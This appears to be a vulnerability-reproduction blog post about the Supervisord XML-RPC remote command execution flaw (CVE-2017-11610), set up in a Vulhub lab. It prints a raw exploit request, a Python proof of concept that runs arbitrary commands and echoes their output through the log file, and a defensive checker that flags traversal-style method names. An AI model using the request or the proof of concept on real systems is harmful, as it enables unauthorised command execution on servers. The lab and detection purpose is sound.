Vulhub vulnerability reproduction 67: Supervisor
2022-07-06 05:16:00 【Revenge_ scan】
CVE-2017-11610: Supervisord remote command execution vulnerability
Preface
Supervisor (http://supervisord.org/) is a client/server service developed in Python. It is a process management tool for Linux/Unix systems and does not support Windows. It makes it easy to monitor, start, stop, and restart one or more processes.
Reference links:
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
- https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
Vulnerability environment
Lab target: 192.168.4.10_ubuntu
```
#docker-compose build
docker-compose up -d
```
After the environment starts, visit `http://your-ip:9001` to view the Supervisord page.

Vulnerability testing
Execute an arbitrary command directly:
```
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```

Checking inside the container shows that `/tmp/success` was created successfully.

## A PoC that echoes the output directly
@Ricter proposed an idea on Weibo that works very well: write the result of the command execution to the log file, then call Supervisord's built-in readLog method to read the log file and retrieve the result.
A simple PoC, [poc.py](poc.py), is posted directly here:
```python
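#!/usr/bin/env python3
import sys
import xmlrpc.client

target = sys.argv[1]   # XML-RPC endpoint, e.g. http://your-ip:9001/RPC2
command = sys.argv[2]  # command whose output should be echoed back

with xmlrpc.client.ServerProxy(target) as proxy:
    # Snapshot the current log so only the new output is printed later
    old = getattr(proxy, 'supervisor.readLog')(0, 0)

    # Resolve the path of the Supervisord log file
    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
    # Run the command and append its output to the log file
    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
    # Read the log again and keep only what was appended
    result = getattr(proxy, 'supervisor.readLog')(0, 0)

    print(result[len(old):])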
```
Run it with Python 3 to get the result: `./poc.py "http://your-ip:9001/RPC2" "command"`
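
For defenders, both the raw request and the PoC above stand out because their `methodName` walks through object attributes instead of naming a plain `namespace.method` pair. The following check over XML-RPC request bodies is an added example, not code from the original post or from Supervisor; the function names and the two-part rule are assumptions, and the sample bodies are constructed from the method names shown on this page.

```python
import xmlrpc.client

def verdict(method):
    """Classify one XML-RPC method name (assumed legitimate form: namespace.method)."""
    parts = method.split(".") if isinstance(method, str) else []
    if len(parts) < 2 or not all(parts):
        return "malformed"
    if len(parts) > 2:
        return "object-traversal"   # e.g. supervisor.supervisord.options...
    if parts[1].startswith("_"):
        return "private-method"
    return "ok"

def audit_rpc_body(body):
    """Return [(method_name, verdict), ...]; system.multicall entries are unpacked too."""
    try:
        # Standard-library parser; for hostile input a hardened parser
        # such as defusedxml is the safer choice.
        params, method = xmlrpc.client.loads(body)
    except Exception:
        return [(None, "unparseable")]
    findings = [(method, verdict(method))]
    if method == "system.multicall" and params and isinstance(params[0], list):
        for call in params[0]:
            name = call.get("methodName") if isinstance(call, dict) else None
            findings.append((name, verdict(name)))
    return findings

def sample_body(method, *args):
    """Build a constructed request body (not captured traffic)."""
    return xmlrpc.client.dumps(args, methodname=method)

# Constructed samples: one normal call, the two traversal calls from this
# page, a traversal hidden inside system.multicall, and a truncated body.
SAMPLES = [
    sample_body("supervisor.readLog", 0, 0),
    sample_body("supervisor.supervisord.options.logfile.strip"),
    sample_body("supervisor.supervisord.options.warnings.linecache.os.system",
                "touch /tmp/success"),
    sample_body("system.multicall",
                [{"methodName": "supervisor.supervisord.options.x", "params": []}]),
    "<methodCall><methodName>broken",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        for name, result in audit_rpc_body(sample):
            print(f"{result:<17} {name}")
```

The same rule can be applied wherever request bodies sent to `/RPC2` are visible, for example at a reverse proxy placed in front of Supervisord.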
